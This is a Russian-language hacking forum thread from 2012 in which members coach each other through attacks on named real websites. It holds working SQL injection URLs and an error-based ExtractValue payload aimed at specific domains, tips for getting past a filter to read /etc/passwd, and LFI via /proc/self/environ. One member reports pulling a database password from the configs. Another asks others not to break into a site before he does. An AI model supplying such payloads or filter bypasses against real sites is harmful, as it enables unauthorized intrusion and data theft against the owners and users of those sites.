Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    359
    Likes Received:
    178
    Reputations:
    108
    Кто сказал, что LFI? Внимательно читаем ерроры и варнинги. Во первых, судя по тому, что при подстановке в GET запрос переменной из ошибки вида - http://kvostava.us/modules/boonex/poll/index.php?aModule не дает никакой реакции. Вывод - либо определяется локально в скриптах, либо в реквесте используется другая переменная , а в скриптах переопределяется на $aModule. В любом случае, неопределенная константа BX_DIRECTORY_PATH_MODULES - в пути к файлу не даст провести операцию. Более того, require_once(BX_DIRECTORY_PATH_MODULESclasses/View.php) явно повествует о том, что вследствии того , что она самая константа неопределена - скрипт не может подключить - константа/classes/View.php. Явно, что модуль, коим данный файл и является, использует константы и прочие данные определенные уровнем выше.
     
  2. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    _ttp://www.localtoolbox.com/corporate/index.php ?cat_id=-9 3+union+select+1,2,3,4,5,6,7,8,9,10, 11--+
    Вроде всё верно делаю, а вот принтабильные поля никак не могу увидеть.
     
  3. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    937
    Likes Received:
    355
    Reputations:
    58
    http://www.localtoolbox.com/corporate/index.php?cat_id=-93'+union+select+1,2,3,version(),5,6,7,8,9,0,11--+
     
  4. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    странно, вроде как пробовал и так, но никакого результата... спасибо огромное. Очень оперативно отозвались
     
  5. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10

    Там аватары до 20 кб только грузить можна.
     
  6. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Если нет вывода ошибки sql injection а сама sql присутствует как узнать сколько таблиц и т.д?
     
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,248
    Likes Received:
    1,148
    Reputations:
    886
    зачем тебе вывод ошибки если нужно узнать количество таблиц? Оо

    если имеется ввиду количество колонок то

    order by, group by

    контент страницы должно менятся если запрос возвращает false
     
    _________________________
    #21227 Konqi, 19 Oct 2012
    Last edited: 19 Oct 2012
  8. cipa21

    cipa21 Elder - Старейшина

    Joined:
    9 Apr 2009
    Messages:
    548
    Likes Received:
    146
    Reputations:
    30
    Какая-то странная инъекция ...
    http://www.glhf.ru/index.php?option=com_seyret&Itemid=105&catid=-1+union+select+0x313233--
     
  9. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    в LFI в запросах фильтруется <? и ?> как обойти?
    фильтрацию прошел проинклудил proc/self/environ
    php код просто написан и почему то не выполняется
     
    #21229 RazyKK, 20 Oct 2012
    Last edited: 20 Oct 2012
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,248
    Likes Received:
    1,148
    Reputations:
    886
    зачем тебе "<?" при LFI?
    ты уверен что это LFI а не обычная читалка?
     
    _________________________
  11. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    да там не include а file_get_contents. фильтруется etc , как можно обойти?
     
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,248
    Likes Received:
    1,148
    Reputations:
    886
    что именно фильтруется? никогда не встречал такого чтоб фильтрировался слово "etc", если /etc/passwd, то попробуй /etc/какаятофигня/../passwd
     
    _________________________
  13. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    etc/любое слово - ошибка
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,248
    Likes Received:
    1,148
    Reputations:
    886
    ну поэксперементируй с кодированием, с хексом и тп
    попрубуй понять логику WAF. а сначала обясни зачем тебе нужен каталог /etc/ ?
     
    _________________________
  15. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    хекс попробовал, 0x...... не работает. конфиги посмотреть. нашел пасс от дб, пробовал удаленно подкл к sql не успешно
     
  16. postscripter

    postscripter New Member

    Joined:
    25 Aug 2012
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Народ, как правильно заэкранировать хвост запроса в MySQL? так /* не получается, и так -- или так # тоже, хотя в запрос они и попадают, но парсер всё равно выполняет всё что идёт за ними... И пишет You have an error in your SQL syntax

    Запрос такой:

    Code:
    select * from (SELECT sector_id,sector_name , (select count(*) from tbl_jobs 
    where status_cd='sENAB' and position_sector=s.sector_id and education_level=9; /* ) 
    job_count FROM tbl_sectors s where lang_cd='RUS' order by order_id)a where a.job_count>0
     
    #21236 postscripter, 20 Oct 2012
    Last edited: 20 Oct 2012
  17. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    попробуй #
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,248
    Likes Received:
    1,148
    Reputations:
    886
    RazyKK

    лучше скрипты изучи

    postscripter

    ссылку скинь, гадалки уже спят
     
    _________________________
    1 person likes this.
  19. postscripter

    postscripter New Member

    Joined:
    25 Aug 2012
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Пожалуйста)) Только не ломайте раньше меня plz, я сам хочу попробовать)) Не отнимайте игрушку, так сказать :D

    Решётка тоже не прокатила. К сожалению...

    Code:
    POST /rabota_01.php HTTP/1.1
    Host: www.karyera.kz
    Accept-Encoding: gzip
    Connection: keep-alive
    User-Agent: Mozilla/5.0 SF/2.09b
    Range: bytes=0-399999
    Referer: http://www.karyera.kz/
    Cookie: LEARN_LANGCD=RUS; LEARN_ANKETID=deleted; HRSITE_COMPANYID=22
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 222
    
    p_EducationID=9#--/*&p_EducationName=&p_LanguageID=&p_LanguageName=&p_GenderID=&p_GenderName=&p_CompanyID=&p_Keyword=&p_pageindx=&p_SectorID=&p_SectorName=&p_LocationID=&p_LocationName=&p_ExperienceID=&p_ExperienceName=&
    В урле слова типа Select фильтруются, поэтому только через post.
     
    #21239 postscripter, 20 Oct 2012
    Last edited: 20 Oct 2012
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,248
    Likes Received:
    1,148
    Reputations:
    886
    http://candidate.karyera.kz/search_01.php

    POST / p_Keyword='or(ExtractValue(1,concat(0x3a,version())))='1

    [​IMG]
     
    _________________________
    #21240 Konqi, 20 Oct 2012
    Last edited: 20 Oct 2012
Thread Status:
Not open for further replies.